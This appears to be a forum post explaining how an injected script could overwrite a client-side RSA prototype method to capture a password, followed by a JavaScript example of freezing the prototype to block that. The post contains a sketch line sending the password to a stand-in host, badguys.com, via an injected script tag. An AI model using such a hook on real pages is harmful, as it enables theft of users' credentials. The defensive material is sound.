You can't attack the post-RSA password field, but if there's any point
along the way that the password is passed inside JavaScript, it might
be possible for a script-injection attacker to overwrite your
functions / add getter functions to prototypes and post your password
using something like rsa.prototype.set()=function(pass){addHack
( '<script src="badguys.com?x='+pass+'/>');...}  Or such.  Of course,
you sound like a smart guy who would already override such functions
to prevent an attack, but not everybody thinks to manually block get()
and set(), so having plain-script authentication would let badguys.com
know if it's worth trying or not...
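
The defensive side of the overwrite described above, as an added example that is not part of the original post: freezing the prototype so a later script cannot replace its methods. The `Rsa` class, its `set` method and the placeholder "encryption" are hypothetical stand-ins, and the password is a constructed sample.

```javascript
'use strict';
// Hypothetical stand-in for a client-side RSA wrapper; all names are assumptions.
function Rsa() { this.cipher = null; }
Rsa.prototype.set = function (pass) {
  // Placeholder, NOT real RSA: marks where the password would be encrypted.
  this.cipher = 'enc(' + pass.length + ' chars)';
  return this.cipher;
};

// Freeze the prototype: existing methods become non-writable and
// non-configurable, and no new properties or accessors can be added.
function lockPrototype(ctor) {
  Object.freeze(ctor.prototype);
  return Object.isFrozen(ctor.prototype);
}

// Simulates a later script attempting to replace a prototype method.
// Returns true if the replacement took effect.
function tryOverwrite(ctor, name, replacement) {
  try {
    ctor.prototype[name] = replacement; // TypeError in strict mode when frozen
  } catch (e) {
    if (!(e instanceof TypeError)) throw e;
  }
  return ctor.prototype[name] === replacement;
}

function demo() {
  const seen = []; // what the replacement function managed to observe
  const hook = function (pass) { seen.push(pass); return 'hooked'; };

  // Unprotected copy of the same class, for comparison.
  function OpenRsa() { this.cipher = null; }
  OpenRsa.prototype.set = Rsa.prototype.set;
  const openReplaced = tryOverwrite(OpenRsa, 'set', hook);
  new OpenRsa().set('constructed-password');

  // Protected class: the overwrite is rejected and the original method runs.
  const frozen = lockPrototype(Rsa);
  const lockedReplaced = tryOverwrite(Rsa, 'set', hook);
  const out = new Rsa().set('constructed-password');

  return { frozen, openReplaced, lockedReplaced, out, seenCount: seen.length };
}
```

Freezing only helps if it runs before any injected script does, so it complements rather than replaces preventing the injection itself.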